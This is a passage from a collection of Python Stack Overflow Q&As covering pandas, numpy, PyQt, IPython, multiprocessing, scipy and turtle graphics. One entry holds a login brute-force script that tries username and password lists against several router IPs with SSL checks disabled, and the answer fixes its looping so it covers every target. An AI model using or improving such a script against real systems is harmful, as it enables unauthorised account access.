`main()` function take any parameter, but rather do the argument parsing
within it (if you parse arguments).
and finally, to install it, all you need to do is:
cd motion_control
sudo python setup.py install
and you'll have `runstepper` and `moveit` installed in the same directory as
your python executable.
HTH
|
Why am I getting a "None" in my Python code?
Question: I'm trying to loop through six Wikipedia pages to get a list of every song
linked. It gives me this error when I run it in Terminal:
Traceback (most recent call last):
File "scrapeproject.py", line 31, in <module>
print (getTableLinks(my_url))
File "scrapeproject.py", line 20, in getTableLinks
html = urlopen(my_url)
File "/Users/adriana/Software/Python-3.5.1/mybuild/lib/python3.5/urllib/request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "/Users/adriana/Software/Python-3.5.1/mybuild/lib/python3.5/urllib/request.py", line 456, in open
req.timeout = timeout
AttributeError: 'NoneType' object has no attribute 'timeout'
I think this is because a None keeps showing up when I print the song list.
Anyone have any suggestions?
**Code:**
from urllib.request import urlopen
from bs4 import BeautifulSoup
import sys
import http.client
main = "https://en.wikipedia.org/wiki/Billboard_Year-End_Hot_100_singles_of_"
year = 2009
def createUrl(main, year):
for i in range(0, 6): # increment years so i can get each link
year += 1
print ("\n\n", year, "\n\n")
fullUrl = main + str(year)
return fullUrl
my_url = createUrl(main, year) # this is how i make createUrl a variable to be used in other functions
def getTableLinks(my_url): # there is a random none appearing in my code
# i think the problem is between here...
html = urlopen(my_url)
bsObj = BeautifulSoup(html.read(), "html.parser")
tabledata = bsObj.find("table", {"class":"wikitable"}).find_all("tr")
# ...and here
for table in tabledata:
try:
links = table.find("a")
if 'href' in links.attrs:
print (links.attrs['href'])
except:
pass
print (getTableLinks(my_url))
Answer: You're not returning anything from `createUrl` so None gets returned instead
If you want to create a batch of six URLs to visit and then scrape, I'd suggest either appending them to a list and returning that list so you can iterate through it for parsing, or mapping each URL to the parsing function directly, as sketched below.
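A small sketch of the list-returning variant; the helper name is a placeholder, and the scraping call reuses the question's getTableLinks function:
def create_urls(main, start_year, count=6):
    # one URL per year, returned together instead of returning inside the loop
    return [main + str(start_year + i) for i in range(1, count + 1)]

for url in create_urls("https://en.wikipedia.org/wiki/Billboard_Year-End_Hot_100_singles_of_", 2009):
    getTableLinks(url)    # the question's scraping function, called once per page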
|
How to access upper left cell of a pandas dataframe?
Question: Here is my pandas DataFrame. How can I access the upper-left cell where `"gender"` appears and change the text? `"gender"` is not in `names.columns`, so I thought it might be `names.index.name`, but that was not it.
import pandas as pd
names = pd.DataFrame({'births': {0: 7065, 1: 2604, 2: 2003, 3: 1939, 4: 1746},
'gender': {0: 'F', 1: 'M', 2: 'F', 3: 'M', 4: 'F'},
'name': {0: 'mary', 1: 'anna', 2: 'emma', 3: 'elizabeth', 4: 'minnie'},
'year': {0: 1880, 1: 1880, 2: 1880, 3: 1880, 4: 1880}})
names = names.pivot_table(index=['name', 'year'], columns='gender', values='births').reset_index()
[](http://i.stack.imgur.com/oUtWw.jpg)
Answer: `gender` is the name of the columns index:
In [16]:
names.columns.name = 'something'
names
Out[16]:
something name year F M
0 anna 1880 NaN 2604
1 elizabeth 1880 NaN 1939
2 emma 1880 2003 NaN
3 mary 1880 7065 NaN
4 minnie 1880 1746 NaN
You can see this when you look at the `.columns` object:
In [18]:
names.columns
Out[18]:
Index(['name', 'year', 'F', 'M'], dtype='object', name='gender')
I guess it does confusingly look like the index name in the output.
Qt Designer promoted widget layout
Question: I am using Qt Designer to design my user interfaces, and I want to build custom widgets that are a combination of existing Qt widgets, such as a QLabel and a QPushButton (see the attached screenshot [](http://i.stack.imgur.com/flgxH.png)).
Now I would like this to be independent, with its own business logic, signals and slots in a separate Python file, but I want to add it as a component to my main screen.
I tried the above by creating a separate .ui file of type Widget, but when I promote to it from my MainWindow, it won't show up; the code generated by pyuic adds it to the layout, but it is not rendered in the main window.
[](http://i.stack.imgur.com/jklDD.png)
Is there a way of doing that in PyQt and Qt Designer?
**EDIT** :
Here is the actual code:
_timer.py_ :
from PyQt4 import QtGui, QtCore
from datetime import timedelta, datetime
from logbook import info
import timer_ui
class Timer(QtGui.QWidget, timer_ui.Ui_TimerWidget):
start_time = None
running = False
total_time = 0
time_spent = ''
activity = None
stopwatch = 0
elapsed_time = None
total_elapsed_time = timedelta()
def __init__(self, parent=None):
super(self.__class__, self).__init__(parent)
self.setupUi(parent) #for custom widget parent is main window here which is dashboard
self.lcdNumber.setDigitCount(12)
self.qt_timer = QtCore.QTimer(self)
self.qt_timer.timeout.connect(self.timer_event)
self.qt_timer.start(1000)
self.goButton.clicked.connect(self.go)
self.breakButton.clicked.connect(self.break_timer)
def go(self):
# date text format .strftime('%a, %d %b %Y %H:%M:%S')
self.start_time = datetime.now().replace(microsecond=0)
self.running = True
self.goButton.setEnabled(False)
self.breakButton.setEnabled(True)
def break_timer(self):
''' break finishes the activity '''
break_time = datetime.now().replace(microsecond=0)
self.activity.log_break(break_time.isoformat())
self.activity = None # activity completed
self.total_elapsed_time += self.elapsed_time
info(self.total_elapsed_time)
self.running = False
# self.lcdNumber.display(str(self.timer.get_elapsed()))
self.goButton.setEnabled(True)
self.breakButton.setEnabled(False)
def timer_event(self):
'''Updates the widget every second'''
if self.running == True:
current_time = datetime.now().replace(microsecond=0)
# if self.elapsed_time is None:
self.elapsed_time = current_time - self.start_time
# else:
#self.elapsed_time += current_time - self.timer.start_time.replace(microsecond=0)
if self.total_elapsed_time is not None:
self.lcdNumber.display(str(self.elapsed_time + self.total_elapsed_time))
else:
self.lcdNumber.display(str(self.elapsed_time))
_mainwindow.py_ :
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dashboard.ui'
#
# Created: Sat Mar 19 11:40:35 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(772, 421)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.widget = Timer(self.centralwidget)
self.verticalLayout.addWidget(self.widget)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.userNameLabel = QtGui.QLabel(self.centralwidget)
self.userNameLabel.setObjectName(_fromUtf8("userNameLabel"))
self.horizontalLayout.addWidget(self.userNameLabel)
self.logoutButton = QtGui.QPushButton(self.centralwidget)
self.logoutButton.setEnabled(True)
self.logoutButton.setObjectName(_fromUtf8("logoutButton"))
self.horizontalLayout.addWidget(self.logoutButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.listView = QtGui.QListView(self.centralwidget)
self.listView.setObjectName(_fromUtf8("listView"))
self.verticalLayout.addWidget(self.listView)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.menuBar = QtGui.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 772, 23))
self.menuBar.setObjectName(_fromUtf8("menuBar"))
MainWindow.setMenuBar(self.menuBar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Title", None))
self.userNameLabel.setText(_translate("MainWindow", "You are now logged in as", None))
self.logoutButton.setText(_translate("MainWindow", "Logout", None))
from timer import Timer
_timer_ui.py_ :
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'timer.ui'
#
# Created: Sat Mar 19 11:41:40 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_TimerWidget(object):
def setupUi(self, TimerWidget):
TimerWidget.setObjectName(_fromUtf8("TimerWidget"))
TimerWidget.resize(412, 52)
self.horizontalLayout = QtGui.QHBoxLayout(TimerWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(TimerWidget)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout.addWidget(self.label)
self.lcdNumber = QtGui.QLCDNumber(TimerWidget)
self.lcdNumber.setAutoFillBackground(False)
self.lcdNumber.setNumDigits(12)
self.lcdNumber.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcdNumber.setObjectName(_fromUtf8("lcdNumber"))
self.horizontalLayout.addWidget(self.lcdNumber)
self.goButton = QtGui.QPushButton(TimerWidget)
self.goButton.setObjectName(_fromUtf8("goButton"))
self.horizontalLayout.addWidget(self.goButton)
self.breakButton = QtGui.QPushButton(TimerWidget)
self.breakButton.setObjectName(_fromUtf8("breakButton"))
self.horizontalLayout.addWidget(self.breakButton)
self.retranslateUi(TimerWidget)
#QtCore.QMetaObject.connectSlotsByName(TimerWidget)
def retranslateUi(self, TimerWidget):
#TimerWidget.setWindowTitle(_translate("TimerWidget", "Form", None))
self.label.setText(_translate("TimerWidget", "Total hours spent", None))
self.goButton.setText(_translate("TimerWidget", "Go!", None))
self.breakButton.setText(_translate("TimerWidget", "Break", None))
Answer: Promoted widgets are just placeholders for standard Qt widgets. You cannot
create a custom widget for Qt Designer that way.
It can be done, but the process is much more complicated than simple widget
promotion. See [Writing Qt Designer
Plugins](http://pyqt.sourceforge.net/Docs/PyQt4/designer.html#writing-qt-
designer-plugins) in the PyQt docs, and for a detailed tutorial, see [Using
Python Custom Widgets In Qt
Designer](http://wiki.python.org/moin/PyQt/Using_Python_Custom_Widgets_in_Qt_Designer)
on the Python Wiki. The [PyQt source
code](http://www.riverbankcomputing.com/software/pyqt/download) also has many
more examples (look in _examples/designer/plugins_).
**EDIT** :
There are two problems with your code. Firstly, you are passing the wrong
argument to `setupUi` in the `Timer` class. You should fix it like this:
class Timer(QtGui.QWidget, timer_ui.Ui_TimerWidget):
...
def __init__(self, parent=None):
super(Timer, self).__init__(parent)
self.setupUi(self) # pass in self, not parent
Secondly, you edited the _mainwindow.py_ file and broke one of the layouts.
Never, **_ever_** edit the modules generated by `pyuic`! The line you broke is
this one:
# self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
But don't try to fix this by editing - instead, make sure you _regenerate_ all
the ui modules with `pyuic` so you get back to clean, unedited files again.
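For reference, the regeneration step is just a matter of re-running pyuic on each ui file, e.g. (file names assumed from the comments in the generated modules):
pyuic4 timer.ui -o timer_ui.py
pyuic4 dashboard.ui -o mainwindow.py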
|
How to force an automatic reload of the library from inside IPython notebook
Question: I'm just learning IPython Notebook, using a pre-existing Python library I've
written. At the beginning of my notebook, I'm importing it in the normal way.
However, I'm still modifying this library. I notice that changes I'm making to
it don't seem to be reflected, even when I reload the notebook in the browser.
How can I force a reload of the library from inside IPython notebook?
Answer: Use the magic
[`autoreload`](http://ipython.readthedocs.org/en/stable/config/extensions/autoreload.html?#module-
IPython.extensions.autoreload) to get your module refreshed automatically as
you edit it.
For instance, if you develop a module called `mylibrary`:
%load_ext autoreload
%autoreload 1
%aimport mylibrary
will automatically reload the module `mylibrary`.
You can ask to get all modules automatically reloaded with:
%autoreload 2
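For example, a minimal sketch of the all-modules mode (`some_function` is just a placeholder for whatever you are working on):
%load_ext autoreload
%autoreload 2
import mylibrary
mylibrary.some_function()  # edit mylibrary.py on disk, re-run this cell: the change is picked up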
|
Different results for linalg.norm in numpy
Question: I am trying to create a feature matrix based on certain features and then
find the distance between the items. For testing purposes I am using only 2 points
right now.
data : list of items I have
specs : feature dict of the items (I am using their values of keys as features
of item)
features : list of features
This is my code using a numpy zeros matrix:
import numpy as np
matrix = np.zeros((len(data),len(features)),dtype=bool)
for dataindex,item in enumerate(data):
if dataindex > 5:
break
specs = item['specs']
values = [value.lower() for value in specs.values()]
for idx,feature in enumerate(features):
if(feature in values):
matrix[dataindex,idx] = 1
print dataindex,idx
v1 = matrix[0]
v2 = matrix[1]
# print v1.shape
diff = v2 - v1
dist = np.linalg.norm(diff)
print dist
The value for dist I am getting is 1.0
This is my code using Python lists:
matrix = []
for dataindex,item in enumerate(data):
if dataindex > 5:
f = open("Matrix.txt",'w')
f.write(str(matrix))
f.close()
break
print "Item" + str(dataindex)
row = []
specs = item['specs']
values = [value.lower() for value in specs.values()]
for idx,feature in enumerate(features):
if(feature in values):
print dataindex,idx
row.append(1)
else:
row.append(0)
matrix.append(row)
v1 = np.array(matrix[0]);
v2 = np.array(matrix[1]);
diff = v2 - v1
print diff
dist = np.linalg.norm(diff)
print dist
The value of dist in this case is 4.35889894354
I have checked many times that the value 1 is being set at the same positions in
both cases, but the answer is different.
Maybe I am not using numpy properly or there is an issue with the logic. I am
using the numpy zeros matrix because of its memory efficiency.
What is the issue?
Answer: It's a type issue:
In [9]: norm(ones(3).astype(bool))
Out[9]: 1.0
In [10]: norm(ones(3).astype(float))
Out[10]: 1.7320508075688772
You must decide which norm is right for your problem and, if necessary, cast
your data with `astype`.
[`norm(M)`](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.linalg.norm.html)
is `sqrt(dot(M.ravel(), M.ravel()))`, so for a boolean matrix `norm(M)` is 0.0
if `M` is all `False` and 1.0 otherwise. Use the `ord` parameter of `norm`
to tune the function.
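Applied to the code in the question, a minimal sketch of the fix is to cast before taking the norm (or simply build the matrix with a numeric dtype instead of bool):
v1 = matrix[0].astype(float)
v2 = matrix[1].astype(float)
dist = np.linalg.norm(v2 - v1)  # now agrees with the python-list version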
|
Python: Is it meaningful to import sub-package?
Question: This statement is from [Python 3
Doc](https://docs.python.org/3/tutorial/modules.html):
> Note that when using from package import item, the item can be either a
> submodule (or subpackage) of the package ...
It says we can `from package import subpackage`.
Here I create a package `audio`, and two subpackage `format` and `sound`.
[](http://i.stack.imgur.com/JCNLm.png)
Then I import its subpackage :
from audio import sound
print(type(sound))
The output is
> class 'module'
It shows that for `from package import subpackage`, the Python interpreter always
treats the item as a `module`, not a `subpackage`.
from audio import sound
print(type(sound.echo))
Moreover, since `sound` is treated as a `module`, how do I access its `echo` module?
It raises
> AttributeError: module 'audio.sound' has no attribute 'echo'
Hence, I wonder whether it is meaningful to import a sub-package, and whether it is
even possible to import a subpackage?
Answer: There is only a
[`module`](https://docs.python.org/3/library/stdtypes.html#modules) type in
Python, `subpackage` is not a type.
All packages and subpackages are modules.
> is it possible to import subpackage
Yes? You already imported `sound` as a subpackage of `audio`...
> is it meaningful to import sub-package
Also, yes. How else would you use the classes and functions defined by any
module?
If you would like to import `echo`, then do so like this
from audio.sound import echo
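The `AttributeError` above happens simply because a submodule only becomes an attribute of its parent once it has been imported somewhere. A small sketch, assuming the `audio/sound/echo.py` layout from the screenshot:
import audio.sound.echo        # imports the package, the subpackage and the module
print(type(audio.sound.echo))  # <class 'module'>
from audio.sound import echo   # the same module, bound to a shorter name
print(type(echo))              # <class 'module'>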
|
Python load list from file and print random selection
Question: I have a file called `projects.txt` that contains the following line of code:
['Apollo', 'Astro', 'Aurora', 'Barcelona']
I use the following Python2 code to load the file and try to print a random
selection but I'm always getting just a single character from my list:
import random
projNames = open('projects.txt').read()
print(random.choice(projNames))
**Example Result:** a
* * *
However, if I copy the contents of the text file directly into the code, it
works properly for me.
import random
projNames = ['Apollo', 'Astro', 'Aurora', 'Barcelona']
print(random.choice(projNames))
**Example Result:** Apollo
I need it to be able to load the contents of the file directly rather than
editing the code in my `.py` file.
What did I overlook in my original code? I am specifically using Python 2.7.x
_(latest version)_.
Answer: You have to parse/evaluate the string first to turn it into a Python list:
import ast
import random
projNames = ast.literal_eval(open('projects.txt').read())
print(random.choice(projNames))
|
python pool doesn't work
Question: I'm trying to use multiprocessing, and in order to keep it simple at first, I'm
running the following code:
import multiprocessing as mp
pool = mp.Pool(4)
def square(x):
return x**2
results=pool.map(square,range(1,20))
As I understand it, results should be a list containing the squares of 1 to 19.
However, the code does not seem to terminate (doing the same without a pool
finishes in a blink; this ran for several minutes before I stopped it
manually).
Additional information: the task manager tells me that the additional Python
processes have been launched and are running, but are using zero % of my CPU,
while other unrelated processes like Firefox skyrocket in their CPU usage
while the program is running. I'm using Windows 8 and an i5-4300U CPU (a pool
size of 2 instead of 4 doesn't help either).
What am I doing wrong? Are there any good resources on the Pool class that
could help me understand what is wrong with my code?
Answer: Code with pool initialization should be inside an `if __name__ == "__main__":` guard, because
`multiprocessing` re-imports the module each time it spawns a new process (notably on Windows).
import multiprocessing as mp
def square(x):
return x**2
if __name__ == '__main__':
pool = mp.Pool(4)
results=pool.map(square,range(1,20))
|
Can continuous random variables be converted into discrete using scipy?
Question: If I initialize a subclass of `scipy.stats.rv_continuous` , for example
`scipy.stats.norm`
>>> from scipy.stats import norm
>>> rv = norm()
Can I convert it into a list of probabilities with each element representing
the probability of a range of values after providing the number of ranges?
Something like - (for the range - [(-inf,-1), (-1,0), (0,1), (1, inf)] )
>>> li
[0.15865525393145707, 0.34134474606854293, 0.34134474606854293, 0.15865525393145707]
( where 0.15865525393145707 is the probability of the variable being less than
-1 and 0.34134474606854293 for being in the range -1 to 0 and similarly for
others.
Can this be done using scipy? If not which python library can support such
conversion operations?
Answer: Based on your comment, you can calculate this using the
[CDF](https://en.wikipedia.org/wiki/Cumulative_distribution_function):
from scipy.stats import norm
import numpy as np
>>> norm().cdf(-1) - norm().cdf(-np.inf), \
norm().cdf(0) - norm().cdf(-1), \
norm().cdf(1) - norm().cdf(0), \
norm().cdf(np.inf) - norm().cdf(1)
(0.15865525393145707,
0.34134474606854293,
0.34134474606854293,
0.15865525393145707)
This follows from the definition of the CDF, basically.
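For many intervals, a small sketch of the same idea using `np.diff` over the bin edges:
from scipy.stats import norm
import numpy as np
edges = np.array([-np.inf, -1.0, 0.0, 1.0, np.inf])
probs = np.diff(norm().cdf(edges))  # probability mass in each interval
print(probs)  # [ 0.15865525  0.34134475  0.34134475  0.15865525]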
* * *
Note that I'm getting numbers that sum to 1, but not the ones you write as the
expected output. I don't know your basis for saying that those are the correct
ones. My guess is you're implicitly using a Normal variable with non-unit
standard deviation.
|
Pandas complex processing with groupby
Question: My data is grouped by id. In each group, it is sorted by colB. The logic I
need to implement is as follows:
If colA is blank, and colD is either (2,3, or 4), then create a column called
'flag' and set flag = 1 in the last non-zero row of colC. Set the flag to 0 in
all the other rows of that group, where colC is non-zero. Remove the rows
where (colA is blank, and colC is 0) for that particular grouping.
Repeat above procedure for all other 'id' groups.
(For rows where colA is non-blank, I can set the flag to what I need.)
Here is the data I have:
id colA ColB colC colD
1 10 1352.23 2
1 11 706.87 2
1 12 1116.6 2
1 13 0 2
1 14 0 2
1 15 0 2
2 2 6884.03 3
2 3 2235.97 3
2 4 3618.04 3
2 5 11745.42 3
3 2013 1 345.98 0
and here is what I would like to get after processing it.
id colA ColB colC colD flag
1 10 1352.23 2 0
1 11 706.87 2 0
1 12 1116.6 2 1
2 2 6884.03 3 0
2 3 2235.97 3 0
2 4 3618.04 3 0
2 5 11745.42 3 1
3 2013 1 345.98 0 0
The data contains many thousands of such groupings. I am hoping someone can
help me in figuring out what the Python code to do the above processing would
look like. I have a basic familiarity with the groupby function, but not to
the extent to be able to figure out how to do the above.
* * *
Here is the code I am trying to use. The code gives the error: "AttributeError:
'str' object has no attribute 'id'."
I am trying to set the "flag" to NaN when I detect the zeros in colC that I
eventually want to remove, so I can drop them easily, in a later step.
def setFlag(grouped):
for name, group in grouped:
for i in range(group.id.size):
drop_candidate = (
pd.isnull(group.iloc[i]['colA'])&
( (group.iloc[i]['colD'] == 2) |
(group.iloc[i]['colD'] == 3) |
(group.iloc[i]['colD'] == 4) )
)
last_nonZero = group[group != 0].index[-1]
if ( (drop_candidate & (group.iloc[i]['colC'] == 0)) ):
group['flag'] = np.nan
elif ((drop_candidate & (group.iloc[i]['colC'] != 0)) & (last_nonZero != i)):
group['flag'] = 0
elif last_nonZero == i:
group['flag'] = 1
return grouped
df.groupby('id').apply(setFlag)
Here is the code to re-create the test dataframe:
import pandas as pd
import numpy as np
df = pd.DataFrame.from_items([
('id', [1,1,1,1,1,1,2,2,2,2,3]),
('colA', [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,2013]),
('colB', [10,11,12,13,14,15,2,3,4,5,1]),
('colC', [1352.23,706.87,1116.6,0,0,0,6884.03,2235.97,3618.04,11745.42,345.98]),
('colD', [2,2,2,2,2,2,3,3,3,3,0]),
('flag', [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,]),
])
Answer: It looks like there are three parts to your process:
1) Get rid of rows where colA is null and colC == 0. Work on reducing your
dataframe first
if it is AND logic:
`reduced_df = df.loc[(df.colA.notnull()) & (df.colC != 0), :].copy()`
if it is OR logic:
reduced_df = df.loc[(df.colA.notnull()) | (df.colC != 0), :].copy()
id colA colB colC colD flag
0 1 NaN 10 1352.23 2 NaN
1 1 NaN 11 706.87 2 NaN
2 1 NaN 12 1116.60 2 NaN
6 2 NaN 2 6884.03 3 NaN
7 2 NaN 3 2235.97 3 NaN
8 2 NaN 4 3618.04 3 NaN
9 2 NaN 5 11745.42 3 NaN
10 3 2013 1 345.98 0 NaN
2) Now you are ready to work on part two, which is flagging the last row of
a group. Since the default flag value is 0, start with that:
`reduced_df.loc[:, 'flag'] = 0`
3) You can find duplicate values using `duplicated` and then make sure colA is
null
reduced_df.loc[~reduced_df.colD.duplicated(keep='last') & reduced_df.colA.isnull(), 'flag'] = 1
reduced_df
id colA colB colC colD flag
0 1 NaN 10 1352.23 2 0
1 1 NaN 11 706.87 2 0
2 1 NaN 12 1116.60 2 1
6 2 NaN 2 6884.03 3 0
7 2 NaN 3 2235.97 3 0
8 2 NaN 4 3618.04 3 0
9 2 NaN 5 11745.42 3 1
10 3 2013 1 345.98 0 0
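Putting the three steps together, a minimal sketch (using the OR-logic filter, which matches the stated requirement of only dropping rows where colA is blank and colC is 0):
reduced_df = df.loc[(df.colA.notnull()) | (df.colC != 0), :].copy()
reduced_df.loc[:, 'flag'] = 0
last_rows = ~reduced_df.colD.duplicated(keep='last') & reduced_df.colA.isnull()
reduced_df.loc[last_rows, 'flag'] = 1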
|
import a module with a variable
Question: Hello dear Python programmers. I have a question about importing
modules into another module with Python 2.7.
I want to know how to import a .py module whose name is held in a variable. In fact,
I would like to import a module based on the needs of my main module, to limit
the memory usage of the computer.
For example, suppose I have 25 modules: 1.py, 2.py ... 25.py. Suppose my main
module P.py needs, at some point, modules 2, 7, 15 and 24.py but not the
others. Because I don't know in advance which modules the main module will need, I currently
import all modules with the import statement: import 1 2 3 ... 25. Is there a
Python function to import only modules 2, 7, 15 and 24 via a variable?
(For example: something_like_import(variable), where variable contains the
name of the module to import.)
Thank you.
Answer: Yes!
from importlib import import_module
module = import_module(variable)
Example:
>>> os = import_module("os")
>>> os.name
'nt'
|
Three nested for loops in python fail
Question: I am trying to write an HTML form brute forcer with three nested for loops: one
for IPs, one for users and one for passwords. However, my code tries all
user:pass combinations only for the first IP address, writes the found
one three times and then stops. I would like to try all user:pass combinations for all
three IP addresses. Here is the code:
import ssl
import base64
import sys
import urllib
import urllib2
import socket
ssl._create_default_https_context = ssl._create_unverified_context
if len(sys.argv) !=4:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
#filename3=str(sys.argv[3])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
#targets = open(filename3,'r')
targets = ['192.168.2.1', '192.168.2.1', '192.168.2.2']
#url = "https://192.168.2.1:8443/login.cgi"
foundusers = []
foundcreds = []
OkStr="url=index.asp"
headers = {}
headers['User-Agent'] = "Googlebot"
i=0
for ip in targets:
url = "https://"+ip.rstrip()+":8443/login.cgi"
for user in userlist.readlines():
for password in passwordlist.readlines():
credentials=base64.b64encode(user.rstrip()+':'+password.rstrip())
#print "trying "+user.rstrip()+':'+password.rstrip()
data = urllib.urlencode({'login_authorization': credentials})
try:
req = urllib2.Request(url, data, headers=headers)
request = urllib2.urlopen(req, timeout = 3)
response = request.read()
print 'ip=%r user=%r password=%r' % (ip, user, password)
#print "[%d]" % (request.code)
if (response.find(OkStr)>0):
foundcreds.append(user.rstrip()+':'+password.rstrip())
request.close()
except urllib2.HTTPError, e:
print "[-] Error = "+str(e)
pass
except socket.timeout, e:
print "[-] Error = "+str(e)
pass
except ssl.SSLError, e:
print "[-] Error = "+str(e)
pass
except urllib2.URLError, e :
print "[-] Error = "+str(e)
pass
if len(foundcreds)>0:
print "Found User and Password combinations:\n"
for name in foundcreds:
print name+"\n"
else:
print "No users found\n"
This is the output:
ip='192.168.2.1' user='admin\n' password='asd\n'
ip='192.168.2.1' user='admin\n' password='qwer\n'
ip='192.168.2.1' user='admin\n' password='rews\n'
ip='192.168.2.1' user='admin\n' password='test\n'
Found User and Password combinations:
admin:test
Found User and Password combinations:
admin:test
Found User and Password combinations:
admin:test
Answer: To implement P. Brunet's suggestion, change this:
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
to:
userlist = open(filename1,'r').readlines()
passwordlist = open(filename2,'r').readlines()
then remove the `.readlines()` from your iterators.
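For clarity, a minimal sketch of how the corrected pieces fit together (the request logic inside the innermost loop stays exactly as in the question):
userlist = open(filename1, 'r').readlines()
passwordlist = open(filename2, 'r').readlines()
for ip in targets:
    url = "https://" + ip.rstrip() + ":8443/login.cgi"
    for user in userlist:              # a list can be iterated again for every ip
        for password in passwordlist:
            credentials = base64.b64encode(user.rstrip() + ':' + password.rstrip())
            # ... build and send the request exactly as before ...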
|
To_CSV unique values of a pandas column
Question: When I use the following:
import pandas as pd
data = pd.read_csv('C:/Users/Z/OneDrive/Python/Exploratory Data/Aramark/ARMK.csv')
x = data.iloc[:,2]
y = pd.unique(x)
y.to_csv('yah.csv')
I get the following error:
AttributeError: 'numpy.ndarray' object has no attribute 'to_csv'
Answer: IIUC, starting from a dataframe:
df = pd.DataFrame({'a':[1,2,3,4,5,6],'b':['a','a','b','c','c','b']})
you can get the unique values of a column with:
g = df['b'].unique()
that returns an array:
array(['a', 'b', 'c'], dtype=object)
to save it into a .csv file I would transform it into a `Series` s:
In [22]: s = pd.Series(g)
In [23]: s
Out[23]:
0 a
1 b
2 c
dtype: object
So you can easily save it:
In [24]: s.to_csv('file.csv')
Hope that helps.
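Applied to the code in the question, a minimal sketch (still assuming the third column is the one you want):
import pandas as pd
data = pd.read_csv('C:/Users/Z/OneDrive/Python/Exploratory Data/Aramark/ARMK.csv')
y = pd.Series(data.iloc[:, 2].unique())
y.to_csv('yah.csv', index=False)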
|
Logic error in python turtle
Question: I am coding in Python 3.2 turtle and I have this beautiful drawing of a tank,
and I know how to move it left and right. However, when trying to make the
tank move up and down, I am faced with the problem that it goes up, but if I
let go and press the up button again, it turns to the left. It might be hard
to explain, so I included the code.
"""
Programmer: Bert
Tank Run 1
"""
#------------------------------------------------------------------------------
#Importing random modules geddit
from turtle import *
from turtle import Turtle
import turtle
import random
#Welcome Statement and story
input("WELCOME TO TANK RUN 1!! PRESS ENTER TO CONTINUE")
Name = input("Name your Tank: ")
quitFunction = input(
"""The """ + Name + """ is in a battle and heading toward the
enemy base camp so that the """ + Name + """ can blow it up
Get to the base camp and do not let enemy
artillery, or soldiers kill you. Good luck"""
)
#setting up variables
unVar1 = 25
unVar2 = 100
unVar3 = 90
unVar4 = 150
unVar5 = -30
unVar6 = 75
unVar7 = 50
t = Turtle()
#defining shapes
def polySquare(t, x, y, length):
t.goto(x, y)
t.setheading(270)
t.begin_poly()
for count in range(4):
t.forward(length)
t.left(90)
t.end_poly()
return t.get_poly()
def polyCircle(t, x, y, radius):
t.up()
t.goto(x, y)
t.down()
t.hideturtle()
t.circle(radius)
t.end_poly()
return t.get_poly()
def polyRectangle(t, x, y, length1, length2):
t.goto(x, y)
t.setheading(270)
t.begin_poly()
for count in range(2):
t.forward(length1)
t.left(90)
t.forward(length2)
t.left(90)
t.end_poly()
return t.get_poly()
def drawLine(t, x1, x2, y1, y2):
t.up()
t.hideturtle()
t.goto(x1, y1)
t.down()
t.goto(x2, y2)
def tankCursor():
"""
Create the tank cursor. An alternate solution is to toss the temporary turtle
and use the commented out polygon assignments instead of the poly* function calls
"""
temporary = turtle.Turtle()
screen = turtle.getscreen()
delay = screen.delay()
screen.delay(0)
temporary.hideturtle()
temporary.penup()
tank = turtle.Shape("compound")
# tire1 = ((10, unVar1), (10, unVar1 - unVar6), (10 + 30, unVar1 - unVar6), (10 + 30, unVar1))
tire1 = polyRectangle(temporary, 10, unVar1, unVar6, 30) # Tire #1
tank.addcomponent(tire1, "gray", "black")
# tire2 = ((110, unVar1), (110, unVar1 - unVar6), (110 + 30, unVar1 - unVar6), (110 + 30, unVar1))
tire2 = polyRectangle(temporary, 110, unVar1, unVar6, 30) # Tire #2
tank.addcomponent(tire2, "gray", "black")
# tire3 = ((110, unVar2), (110, unVar2 - unVar6), (110 + 30, unVar2 - unVar6), (110 + 30, unVar2))
